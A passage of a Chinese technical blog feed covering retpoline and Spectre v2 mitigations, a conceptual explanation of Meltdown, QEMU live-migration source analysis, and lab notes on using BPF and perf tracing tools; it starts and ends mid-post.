<p>上面是一个典型的间接跳转。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># gcc -mindirect-branch=thunk test.c -o test
# objdump -d test
...
00000000004004d8 <main>:
4004d8: 55 push %rbp
4004d9: 48 89 e5 mov %rsp,%rbp
4004dc: 48 83 ec 10 sub $0x10,%rsp
4004e0: 48 c7 45 f8 c7 04 40 movq $0x4004c7,-0x8(%rbp)
4004e7: 00
4004e8: 48 8b 55 f8 mov -0x8(%rbp),%rdx
4004ec: b8 00 00 00 00 mov $0x0,%eax
4004f1: e8 07 00 00 00 callq 4004fd <__x86_indirect_thunk_rdx>
4004f6: b8 00 00 00 00 mov $0x0,%eax
4004fb: c9 leaveq
4004fc: c3 retq
00000000004004fd <__x86_indirect_thunk_rdx>:
4004fd: e8 07 00 00 00 callq 400509 <__x86_indirect_thunk_rdx+0xc>
400502: f3 90 pause
400504: 0f ae e8 lfence
400507: eb f9 jmp 400502 <__x86_indirect_thunk_rdx+0x5>
400509: 48 89 14 24 mov %rdx,(%rsp)
40050d: c3 retq
40050e: 66 90 xchg %ax,%ax
...
</code></pre></div></div>
<p>我们可以看到间接跳转已经被retpoline的指令系列所替换。
当然,如果是一些内嵌汇编的间接跳转,则需要自己手动去增加retpoline序列。</p>
<p>在Linux内核中,是通过一个内核命令行参数来决定是否开启retpoline的,如果开启则内核在启动时动态替换指令。这样最大限度的减小了内核的性能损耗。</p>
Spectre Mitigation介绍2018-03-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/03/07/spectre-mitigation
<h3>背景</h3>
<p>CPU使用indirect branch predictors来进行投机执行。攻击者能够通过训练这个predictor来控制CPU执行特定的指令,然后做一些侧信道分析。这也就是spectre变种2漏洞。</p>
<p>Intel在硬件层面提供了3个机制用来控制indirect branch,操作系统可以利用这三个机制防止入侵者控制indirect branch predictor。这个三个机制分别是IBRS, STIBP, IBPB。本文主要介绍这三个机制以及在Linux upstream中的状态,并且从个人角度会给出一些修复建议。</p>
<h3>Indirect Branch Control 机制介绍 </h3>
<p>CPUID.(EAX=7H,ECX=0):EDX[26]为1则表示支持IBRS和IBPB,OS可以写IA32_SPEC_CTRL[0] (IBRS) and IA32_PRED_CMD[0] (IBPB)来控制indirect branch predictor的行为。
CPUID.(EAX=7H,ECX=0):EDX[27]为1表示支持STIBP, OS可以写IA32_SPEC_CTRL[1] (STIBP)。</p>
<p>这里可以看到多了两个MSR,IA32_SPEC_CTRL和IA32_PRED_CMD,IBRS和STIBP通过前一个MSR控制,IBPB通过后一个MSR控制。从名字也可以看出,IBRS和STIBP是一种control,IBPB是一种command,具体来说,就是IBRS和STIBP会有状态信息,而IBPB是一种瞬时值。不恰当举例,IBRS类似于你每个月都会发工资,然后零花钱就会可以预见的增多,IBPB类似于地上捡了10块钱。</p>
<p>Indirect Branch Restricted Speculation (IBRS): 简单点来说,一般情况下,在高权限代码里面向IBRS的控制位写1,就能够保证indirect branch不被低权限时候train出来的predictor影响,也能够防止逻辑处理器的影响(超线程的时候)。这里权限转换就是host user-> host kernel, guest -> host等等。可以把IBRS理解成不同特权级之间的predictor隔离。
IBRS不能防止同一个级别的predictor共享,需要配合IBPB。
IBRS也不能防止RSB的污染,需要在进入特权级的时候情况RSB。</p>
<p>Single thread indirect branch predictors (STIBP): 超线程中,一个core的逻辑处理器会共享一个indirect branch predictor,STIBP就是禁止这种共享,防止一个逻辑处理器的predictor被另一个污染。STIBP是IBRS的一个子集,所以一般开启了IBRS就不用开STIBP了。</p>
<p>Indirect Branch Predictor Barrier (IBPB): IBPB类似于一个barrier, 在这之前的indirect branch predictor不会影响这之后的。</p>
<p>综上,IBRS和IBPB可以结合起来一起作为spectre变种2的mitigation:
IBRS用于防止权限之间的predictor污染,IBPB用来阻止同一个权限下不同的实体之间的predictor污染(比如应用程序之间或者虚拟机之间)。</p>
<h3> Linux状态及修复建议</h3>
<p>IBRS由于性能问题最终还是没能进入内核,upstream最终选择了Google的retpoline方案,说句题外话,Google发现了漏洞,然后自己整的修复方案还进入了upstream,可以说是非常牛了,IBPB我看已经进入内核了(至少在vm切换的时候)。</p>
<p>个人修复建议:
从上面可以看到修复方案可以有两种选择。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>retpoline + IBPB, retpoline需要对内核修改比较大,并且需要编译器支持。
IBRS + IBPB, 方案比较简单,稳定性能够保证,可以只在虚拟化这边部署,guest/host用IBRS, guest/guest用IBPB。
</code></pre></div></div>
<p>建议可以先测测第二种方案的性能,看看损失到底几何再做决定。</p>
<h3> 参考 </h3>
<p><a href="http://kib.kiev.ua/x86docs/SDMs/336996-001.pdf">Speculative Execution Side Channel
Mitigations</a></p>
<p><a href="https://medium.com/@mattklein123/meltdown-spectre-explained-6bc8634cc0c2">Meltdown and Spectre, explained</a></p>
qemu热迁移简介2018-03-01T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/03/01/qemu-live-migration
<h3> 热迁移的用法 </h3>
<p>虚拟化环境中热迁移的好处是很明显的,所以QEMU/KVM在很早就支持了热迁移。
首先我们来看一下热迁移是怎么用的。按照官网<a href="https://www.linux-kvm.org/page/Migration">指示</a>,一般来说需要迁移的src和dst同时访问虚拟机镜像,这里为了简单起见,我们只是在两台host使用同一个虚拟机镜像。</p>
<p>在src启动一个虚拟机vm1:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu-system-x86_64 -m 2048 -hda centos.img -vnc :0 --enable-kvm
</code></pre></div></div>
<p>在dst启动另一个虚拟机vm2:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu-system-x86_64 -m 2048 -hda centos.img -vnc :0 --enable-kvm -incoming tcp:0:6666
</code></pre></div></div>
<p>在vm1的的monitor里面输入:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>migrate tcp:$ip:6666
</code></pre></div></div>
<p>隔了十几秒可以看到vm2已经成为了vm1的样子,vm1处于stop状态。</p>
<h3> 热迁移的基本原理 </h3>
<p><img src="/assets/img/qemulm/1.png" alt="" /></p>
<p>首先看看热迁移过程中qemu的哪些部分会包含进来。上图中间的灰色部分是虚拟机的内存,它对于qemu来说是完全的黑盒,qemu不会做任何假设,而只是一股脑儿的发送到dst。左边的区域是表示的设备状态,这部分是虚拟机可见的,qemu使用自己的协议来发送这部分。右边的是不会迁移的部分,但是还是将dst和src保持一致,所以一般来说,src和dst的虚拟机使用相同的qemu command line能够保证这部分一致。</p>
<p>需要满足很多条件才能进行热迁:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. 使用共享存储,如NFS
2. host的时间要一致
3. 网络配置要一致,不能说src能访问某个网络,dst不能
4. host CPU类型要一致,毕竟host导出指令集给guest
5. 虚拟机的机器类型,QEMU版本,rom版本等
</code></pre></div></div>
<p>热迁移主要包括三个步骤:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. 将虚拟机所有RAM设置成dirty,主要函数:ram_save_setup
2. 持续迭代将虚拟机的dirty RAM page发送到dst,直到达到一定条件,不如dirty page数量比较少, 主要函数:ram_save_iterate
3. 停止src上面的guest,把剩下的dirty RAM发送到dst,之后发送设备状态,主要函数: qemu_savevm_state_complete_precopy
</code></pre></div></div>
<p>其中步骤1和步骤2是上图中的灰色区域,步骤3是灰色和左边的区域。</p>
<p>之后就可以在dst上面继续运行qemu程序了。</p>
<h3> 发送端源码分析 </h3>
<p>在qemu的monitor输入migrate命令后,经过的一些函数:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hmp_migrate
->qmp_migrate
->tcp_start_outgoing_migration
->socket_start_outgoing_migration
->socket_outgoing_migration
->migration_channel_connect
->qemu_fopen_channel_output
->migrate_fd_connect
</code></pre></div></div>
<p>最后这个函数就重要了,创建了一个迁移线程,线程函数为migration_thread</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void migrate_fd_connect(MigrationState *s)
{
xxx
qemu_thread_create(&s->thread, "migration", migration_thread, s,
QEMU_THREAD_JOINABLE);
s->migration_thread_running = true;
}
static void *migration_thread(void *opaque)
{
xxx
qemu_savevm_state_begin(s->to_dst_file, &s->params);
xxx
while (s->state == MIGRATION_STATUS_ACTIVE ||
s->state == MIGRATION_STATUS_POSTCOPY_ACTIVE) {
xxx
if (!qemu_file_rate_limit(s->to_dst_file)) {
uint64_t pend_post, pend_nonpost;
qemu_savevm_state_pending(s->to_dst_file, max_size, &pend_nonpost,
&pend_post);
xxx
if (pending_size && pending_size >= max_size) {
xxx
/* Just another iteration step */
qemu_savevm_state_iterate(s->to_dst_file, entered_postcopy);
} else {
migration_completion(s, current_active_state,
&old_vm_running, &start_time);
break;
}
}
xxx
}
</code></pre></div></div>
<p>migration_thread主要就是用来完成之前提到的热迁移三个步骤。
首先来看第一个步骤,qemu_savevm_state_begin标记所有RAM为dirty:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu_savevm_state_begin
-->ram_save_setup
-->ram_save_init_globals
-->bitmap_new
-->bitmap_set
</code></pre></div></div>
<p>接着看第二个步骤,由migration_thread中的while循环中的两个函数完成:
qemu_savevm_state_pending和qemu_savevm_state_iterate。</p>
<p>第一个函数通过调用回调函数ram_save_pending确定还要传输的字节数,比较简单。
第二个函数通过调用回调函数ram_save_iterate用来把dirty传到dst上面。</p>
<p>ram_save_iterate
–>ram_find_and_save_block
–>find_dirty_block
–>ram_save_host_page
–>ram_save_target_page
–>migration_bitmap_clear_dirty
–>ram_save_page
–>qemu_put_buffer_async
–>…->qemu_fflush
–>…->send</p>
<p>在while循环中反复调用ram_save_pending和ram_save_iterate不停向dst发送虚拟机脏页,直到达到一定的条件,然后进入第三个步骤。</p>
<p>第三个步骤就是在migration_thread中调用migration_completion,在这一步中会停止src虚拟机,然后把最后剩的一点脏页拷贝到dst去。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>migration_completion
-->vm_stop_force_state
-->bdrv_inactivate_all
-->qemu_savevm_state_complete_precopy
-->ram_save_complete
-->ram_find_and_save_block
</code></pre></div></div>
<p>可以看到最后一个函数跟第二个阶段传输脏页一样了。</p>
<h3>接收端源码分析</h3>
<p>接收端的qemu运行参数跟发送端的一样,但是多了一个参数-incoming tcp:0:6666, qemu在解析到-incoming后,就会等待src迁移过来,我们来看看这个流程。</p>
<p>main
–>qemu_start_incoming_migration
–>tcp_start_incoming_migration
–>socket_start_incoming_migration
–>socket_accept_incoming_migration
–>migration_channel_process_incoming
–>qemu_fopen_channel_input
–>migration_fd_process_incoming
–>process_incoming_migration_co
–>qemu_loadvm_state
..->bdrv_invalidate_cache_all</p>
<p>process_incoming_migration_co函数用来完成接收数据,恢复虚拟机的运行。最重要的是qemu_loadvm_state,用于接收数据,在dst重构虚拟机。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int qemu_loadvm_state(QEMUFile *f)
{
xxx 检查版本
ret = qemu_loadvm_state_main(f, mis);
xxx
cpu_synchronize_all_post_init();
return ret;
}
</code></pre></div></div>
<p>显然,qemu_loadvm_state_main是构建虚拟机的主要函数。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int qemu_loadvm_state_main(QEMUFile *f, MigrationIncomingState *mis)
{
uint8_t section_type;
int ret = 0;
while ((section_type = qemu_get_byte(f)) != QEMU_VM_EOF) {
ret = 0;
trace_qemu_loadvm_state_section(section_type);
switch (section_type) {
case QEMU_VM_SECTION_START:
case QEMU_VM_SECTION_FULL:
ret = qemu_loadvm_section_start_full(f, mis);
if (ret < 0) {
goto out;
}
break;
case QEMU_VM_SECTION_PART:
case QEMU_VM_SECTION_END:
ret = qemu_loadvm_section_part_end(f, mis);
if (ret < 0) {
goto out;
}
break;
case QEMU_VM_COMMAND:
ret = loadvm_process_command(f);
trace_qemu_loadvm_state_section_command(ret);
if ((ret < 0) || (ret & LOADVM_QUIT)) {
goto out;
}
break;
default:
error_report("Unknown savevm section type %d", section_type);
ret = -EINVAL;
goto out;
}
}
out:
if (ret < 0) {
qemu_file_set_error(f, ret);
}
return ret;
}
</code></pre></div></div>
<p>qemu_loadvm_state_main在一个循环里面处理各个section, src会把QEMU_VM_SECTION_START等标志放到流中。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu_loadvm_section_start_full
-->find_se
-->vmstate_load
-->ram_load
-->qemu_get_buffer
</code></pre></div></div>
<p>最后一个函数负责把接收到的数据拷贝到dst这端虚拟机内存上。
本文就是对热迁移的简单分析,后面会对一些具体的问题进行分析。</p>
<h3>参考</h3>
<p>Amit Shah: <a href="https://developers.redhat.com/blog/2015/03/24/live-migrating-qemu-kvm-virtual-machines/">Live Migrating QEMU-KVM Virtual Machines</a></p>
meltdown漏洞小白理解2018-01-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/01/04/metldown
<p>这篇文章的目的是帮助像我一样的小白快速理解meltdown漏洞。</p>
<p>直接上图</p>
<p><img src="/assets/img/meltdown/1.png" alt="" /></p>
<p>漏洞引起的根源还是CPU的推测执行。上图1,2,3三条指令表面上看是依次执行的,但是实际上呢,只能的CPU早就开始并行执行了,当然是为了提高效率。
比如上面在执行指令1的时候也可以同时执行指令2,3。当然,因为执行指令1的时候出错了,依赖于此的后续指令虽然已经执行了,但是并不会提交到寄存器,也就是说CPU其实白忙活了, rax, rbx的数据并不会被改变。这叫做CPU预测出错回滚。问题就出在这个回滚上,表面看上似乎各种寄存器/架构状态都回滚回去了,但是其实TLB或者缓存并没有回滚。</p>
<p>正常情况下执行指令1的时候由于我们直接在用户态访问内核地址,肯定是访问不了的。但是在CPU层面,其实权限检查和数据读取时分开的,当然也是为了提高效率。CPU在读取了内核地址的数据之后,也就是1a执行了,然后由于预测执行,也在并行执行2,3指令,如果执行完了2,3指令,还没有执行到1b这部分,也就是没有设置异常的一个flag,这个时候3的指令就会把rbx+rax*4096地址里面的数据读到缓存中。我们在2中把这个指令左移了0xc位,所以相当于乘了4096。我们把rax*4096用于访问一个数组,所以rbx+rax*4096就会被缓存了。那这个时候CPU再执行1b发现权限不对开始回滚,但是由于缓存没有清理,所以这个数据还在缓存里面。</p>
<p>这个时候我们就可以对rbx + i*4096这些位置进行访问了。由于我们只有一个地址被缓存了,所以访问其中某一个地址用的时间会大大小于其他地址,所以我们就才出了相应的内存地址的值。这就是所谓的侧信道攻击。</p>
linux-tracing-workshop-part 32017-12-13T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/12/13/tracing3
<p>记录<a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a>实验过程,第三部分共三篇。</p>
<ul>
<li><a href="#13">13. Using BPF Tools: trace and argdist One-Liners</a></li>
<li><a href="#14">14. Using BPF Tools: CPU and Off-CPU Investigation</a></li>
<li><a href="#15">15. Using perf Tools: Slow File I/O</a></li>
</ul>
<h2 id="13">13. Using BPF Tools: trace and argdist One-Liners</h2>
<h3>使用trace显示所有登陆尝试</h3>
<p>每当登陆系统或者使用su时,都有set*uid被调用,据此可以用trace记录所有系统的登陆和sudo操作。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace '::sys_setuid "uid=%d", arg1'
PID TID COMM FUNC -
53999 53999 sshd sys_setuid uid=0
54050 54050 su sys_setuid uid=1000
54076 54076 cron sys_setuid uid=0
54103 54103 cron sys_setuid uid=0
</code></pre></div></div>
<h3>使用argdist指出热门文件</h3>
<p>argdist显示函数参数的分布,可以用来trace __vfs_write 和 __vfs_read的参数用以判断出热门文件。
在一个终端启动argdist,另一个终端启动一个dd:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dd if=/dev/zero of=/dev/null bs=1K count=1M
</code></pre></div></div>
<p>下面是显示结果:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./argdist -T 5 -i 2 -C 'p::__vfs_write(struct file *f):char*:f->f_path.dentry->d_name.name#writes' -C 'p::__vfs_read(struct file *f):char*:f->f_path.dentry->d_name.name#reads'
[16:11:05]
writes
COUNT EVENT
1 f->f_path.dentry->d_name.name = kprobe_events
3 f->f_path.dentry->d_name.name = [eventfd]
3 f->f_path.dentry->d_name.name = 1
7 f->f_path.dentry->d_name.name = TCP
reads
COUNT EVENT
1 f->f_path.dentry->d_name.name = inotify
1 f->f_path.dentry->d_name.name = [timerfd]
3 f->f_path.dentry->d_name.name = [eventfd]
24 f->f_path.dentry->d_name.name = ptmx
[16:11:07]
writes
COUNT EVENT
9 f->f_path.dentry->d_name.name = 1
24 f->f_path.dentry->d_name.name = TCP
reads
COUNT EVENT
18 f->f_path.dentry->d_name.name = ptmx
[16:11:09]
writes
COUNT EVENT
1 f->f_path.dentry->d_name.name = TCP
1 f->f_path.dentry->d_name.name = 4
6 f->f_path.dentry->d_name.name = 1
15 f->f_path.dentry->d_name.name = TCP
505475 f->f_path.dentry->d_name.name = null
reads
COUNT EVENT
1 f->f_path.dentry->d_name.name = TCP
2 f->f_path.dentry->d_name.name = ld-2.23.so
3 f->f_path.dentry->d_name.name = dd
28 f->f_path.dentry->d_name.name = ptmx
505475 f->f_path.dentry->d_name.name = zero
</code></pre></div></div>
<h3>使用trace显示PostgreSQL的查询</h3>
<p>本节直接用trace跟踪postgresql的USDT probe。</p>
<p>启动postgres,连到对应的数据库:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu1604:/usr/local/pgsql/bin$ ./psql -d postgres
postgres=# \c foo
You are now connected to database "foo" as user "test".
foo=# select * from tbl
</code></pre></div></div>
<p>多次查找尝试找到对应的插入操作的进程为54397。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ^Croot@ubuntu1604:/usr/share/bcc/tools# ps aux | grep postgres
test 49781 0.0 0.8 172968 16660 pts/0 S Dec06 0:00 /usr/local/pgsql/bin/postgres -D /tmp/pgdata
test 49784 0.0 0.2 173112 4664 ? Ss Dec06 0:00 postgres: checkpointer
test 49785 0.0 0.2 172968 5000 ? Ss Dec06 0:00 postgres: background writer
test 49786 0.0 0.4 172968 8192 ? Ss Dec06 0:01 postgres: walwriter
test 49787 0.0 0.3 173624 6440 ? Ss Dec06 0:00 postgres: autovacuum launcher
test 49788 0.0 0.1 28052 2280 ? Ss Dec06 0:01 postgres: stats collector
test 49789 0.0 0.1 173396 3824 ? Ss Dec06 0:00 postgres: logical replication launcher
test 54372 0.0 0.2 34240 4100 pts/1 S+ 16:39 0:00 ./psql -d postgres
test 54397 0.0 0.5 173904 11152 ? Ss 16:41 0:00 postgres: test foo [local] idle
root 54400 0.0 0.0 15784 932 pts/4 S+ 16:42 0:00 grep --color=auto postgres
-
^Croot@ubuntu1604:/usr/share/bcc/tools# ./trace -p 54397 'u:/usr/local/pgsql/bin/postgres:query__start "%s", arg1'
PID TID COMM FUNC -
54397 54397 postgres query__start select * from tbl
</code></pre></div></div>
<h3>使用argdist显示postgresql的延时分布</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> argdist -c -i 5 -H 'r:/usr/local/pgsql/bin/postgres:PortalRun():u64:$latency/1000000#latency (ms)'
</code></pre></div></div>
<p>将<a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/pg-slow.sql">pg-slow.sql</a>拷到/tmp, 然后在pgsql命令行执行</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> foo=# \i /tmp/pg-slow.sql
</code></pre></div></div>
<p>输出:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./argdist -c -i 5 -H 'r:/usr/local/pgsql/bin/postgres:PortalRun():u64:$latency/1000000#latency (ms)'
[17:18:00]
latency (ms) : count distribution
0 -> 1 : 1 |****************************************|
[17:18:05]
latency (ms) : count distribution
0 -> 1 : 1 |******** |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 5 |****************************************|
256 -> 511 : 0 | |
512 -> 1023 : 0 | |
1024 -> 2047 : 0 | |
2048 -> 4095 : 0 | |
4096 -> 8191 : 1 |******** |
</code></pre></div></div>
<h2 id="14"> 14. Using BPF Tools: CPU and Off-CPU Investigation </h2>
<p>该实验调查一个表面上是CPU-bound的程序,但是实际有大部分时间没有使用CPU。</p>
<p>编译运行:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -fno-inline -pthread blocky.c -o blocky
root@ubuntu1604:~/linux-tracing-workshop# ./blocky
[*] Ready to process requests.
[*] Backend handler initialized.
[*] Request processor initialized.
[*] Request processor initialized.
[-] Handled 1000 requests.
[-] Handled 2000 requests.
</code></pre></div></div>
<p>看起来在以稳定的频率处理请求。</p>
<p>但是用top可以看到blocky的CPU利用率是很低的,说明很多时候它并没有在用CPU。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./profile -F 997 -f -p $(pidof blocky) > folded-stacks
root@ubuntu1604:/usr/share/bcc/tools# ~/FlameGraph/flamegraph.pl folded-stacks > profile.svg
</code></pre></div></div>
<p>生成火焰图,从火焰图可以看到 request_processor 和 do_work消耗了比较多的CPU, 也可以看到程序经常需要陷入对锁的等待中。</p>
<p><img src="/assets/img/tracing3/1.png" alt="" /></p>
<p>下面用cpudist查看on-cpu和off-cpu的时间各花费了多少时间:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:/usr/share/bcc/tools$ sudo ./cpudist -p $(pidof blocky)
[sudo] password for test:
Tracing on-CPU time... Hit Ctrl-C to end.
^C
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 3 |*************** |
4 -> 7 : 3 |*************** |
8 -> 15 : 2 |********** |
16 -> 31 : 5 |************************* |
32 -> 63 : 3 |*************** |
64 -> 127 : 5 |************************* |
128 -> 255 : 1 |***** |
256 -> 511 : 2 |********** |
512 -> 1023 : 1 |***** |
1024 -> 2047 : 0 | |
2048 -> 4095 : 3 |*************** |
4096 -> 8191 : 8 |****************************************|
8192 -> 16383 : 2 |********** |
</code></pre></div></div>
<p>从上面可以看到是双峰分布,有两个计算比较密集的点,一个比较短,一个比较长。需要关注比较短的,这说明程序在换进换出。看看off-cpu的值:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:/usr/share/bcc/tools$ sudo ./cpudist -O -p $(pidof blocky)
Tracing off-CPU time... Hit Ctrl-C to end.
^C
usecs : count distribution
0 -> 1 : 2 | |
2 -> 3 : 1 | |
4 -> 7 : 4 | |
8 -> 15 : 7 | |
16 -> 31 : 7 | |
32 -> 63 : 3 | |
64 -> 127 : 48 |*** |
128 -> 255 : 93 |****** |
256 -> 511 : 28 |* |
512 -> 1023 : 11 | |
1024 -> 2047 : 10 | |
2048 -> 4095 : 6 | |
4096 -> 8191 : 6 | |
8192 -> 16383 : 580 |****************************************|
16384 -> 32767 : 556 |************************************** |
</code></pre></div></div>
<p>我们看到也是一个双峰分布,表示程序waiting的时间。但是这些睡眠是哪里来的,使用offcputime可以知道这个答案:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:/usr/share/bcc/tools$ sudo ./offcputime -f -p $(pidof blocky) > ~/folded-stacks
[sudo] password for test:
^Ctest@ubuntu:/usr/share/bcc/tools$ ls ~
...
test@ubuntu:/usr/share/bcc/tools$ ~/FlameGraph/flamegraph.pl ~/folded-stacks > offcpu.svg
bash: offcpu.svg: Permission denied
test@ubuntu:/usr/share/bcc/tools$ ~/FlameGraph/flamegraph.pl ~/folded-stacks > ~/offcpu.svg
test@ubuntu:/usr/share/bcc/tools$
</code></pre></div></div>
<p>从火焰图可以看到确实有两条路径在等待,一个是在backend_handler调用nanosleep,一个是在request_processor调用__lll_lock_wait:</p>
<p><img src="/assets/img/tracing3/2.png" alt="" /></p>
<h2 id="15"> 15. Using perf Tools: Slow File I/O </h2>
<p>这个实验跟之前一样,只是这次用perf并且用火焰图显示写文件的路径。</p>
<p>编译运行logger:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -O0 -pthread logger.c -o logger
root@ubuntu1604:~/linux-tracing-workshop# ./logger
</code></pre></div></div>
<p>从iolatency可以看到大部分io都能很快完成,但是也有比较慢的io:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools# ./iolatency
Tracing block I/O. Output every 1 seconds. Ctrl-C to end.
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 92 |############################### |
1 -> 2 : 114 |######################################|
2 -> 4 : 3 |# |
4 -> 8 : 3 |# |
8 -> 16 : 8 |### |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 103 |################################## |
1 -> 2 : 117 |######################################|
2 -> 4 : 4 |## |
4 -> 8 : 1 |# |
8 -> 16 : 4 |## |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 96 |################################## |
1 -> 2 : 108 |######################################|
2 -> 4 : 6 |### |
4 -> 8 : 1 |# |
8 -> 16 : 4 |## |
16 -> 32 : 4 |## |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 87 |################################ |
1 -> 2 : 106 |######################################|
2 -> 4 : 3 |## |
4 -> 8 : 4 |## |
8 -> 16 : 6 |### |
16 -> 32 : 2 |# |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 102 |######################################|
1 -> 2 : 103 |######################################|
2 -> 4 : 7 |### |
4 -> 8 : 1 |# |
8 -> 16 : 5 |## |
</code></pre></div></div>
<p>用bitesize可以看到大部分的io都比较小,但是也有比较大的:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/disk# ./bitesize
Tracing block I/O size (bytes), until Ctrl-C...
^C
Kbytes : I/O Distribution
-> 0.9 : 2722 |######################################|
1.0 -> 7.9 : 2601 |##################################### |
8.0 -> 63.9 : 1342 |################### |
64.0 -> 127.9 : 0 | |
128.0 -> : 145 |### |
</code></pre></div></div>
<p>为了知道IO操作的来源,我们需要记录block:block_rq_insert点的栈回溯:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/disk# perf record -p $(pidof logger) -e block:block_rq_insert -g -- sleep 10
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.137 MB perf.data (450 samples) ]
</code></pre></div></div>
<p>生成火焰图:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/disk# perf script | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl > io-stacks.svg
</code></pre></div></div>
<p><img src="/assets/img/tracing3/3.png" alt="" /></p>
<p>从火焰图可以看出来,IO的来源有两个线程,左边运行的时间比较多,应该就是小IO,右边运行得比较少,对应大IO。</p>
linux-tracing-workshop-part 22017-12-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/12/07/tracing2
<p>记录<a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a>实验过程,第二部分共三篇。</p>
<ul>
<li><a href="#8">8. Writing BPF Tools: setuidsnoop</a></li>
<li><a href="#9">9. Writing BPF Tools: dbslower</a></li>
<li><a href="#10">10. Writing BPF Tools: Contention Stats and Stacks</a></li>
</ul>
<h2 id="8">8. Writing BPF Tools: setuidsnoop</h2>
<p>本节试着写一个BPF来跟踪setuid系统调用。
我们可以使用trace来跟踪setuid:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./trace.py 'sys_setuid "uid=0x%x", arg1' 'r::sys_setuid "rc=%d", retval'
PID TID COMM FUNC -
34913 34913 su sys_setuid uid=0x3e8
34913 34913 su sys_setuid rc=0
34932 34932 cron sys_setuid uid=0x0
34932 34932 cron sys_setuid rc=0
</code></pre></div></div>
<p>也可以写一个独立的BPF工具,本节模仿killsnoop.py内容实现setuid的trace。</p>
<p>第一步,替换sys_kill为sys_setuid</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kprobe__sys_kill->kprobe__sys_setuid
kretprobe__sys_kill->kretprobe__sys_setuid
</code></pre></div></div>
<p>第二步,修改函数签名</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kprobe__sys_setuid(struct pt_regs *ctx, int tpid, int sig)-->
int kprobe__sys_setuid(struct pt_regs *ctx, u32 uid)
</code></pre></div></div>
<p>第三步,修改数据结构,用setuid的参数替换kill的参数</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct val_t {
u64 pid;
u32 uid;
char comm[TASK_COMM_LEN];
};
struct data_t {
u64 pid;
u32 uid;
int ret;
char comm[TASK_COMM_LEN];
};
class Data(ct.Structure):
